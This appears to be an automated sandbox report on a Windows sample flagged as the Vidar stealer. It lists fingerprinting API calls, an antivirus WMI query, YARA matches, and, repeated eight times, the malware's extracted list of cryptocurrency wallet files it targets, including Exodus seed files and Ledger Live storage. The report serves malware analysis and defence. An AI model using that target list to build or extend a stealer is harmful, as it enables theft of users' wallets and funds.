Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003D1000 cpuid

0_2_003D1000

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	0_2_003DFC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	6_2_0040FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	6_2_20002CB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	6_2_20002D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	6_2_20002DF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_20003300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,	6_2_1FE12112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,	6_2_1FE12112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_1FE13AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	6_2_1FFEFF17

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Queries volume information: C:\ProgramData\EHDHIDAEHC.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003EA440 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_003EA440

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003DFAE0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_003DFAE0

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003DFBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_003DFBC0

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, type: SAMPLE
Source: Yara match	File source: 0.2.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.439a680.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.436ce50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.439a680.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.436ce50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2094707680.000000000436C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2092269679.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1698830320.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.000000000439A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2173978549.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2343148482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
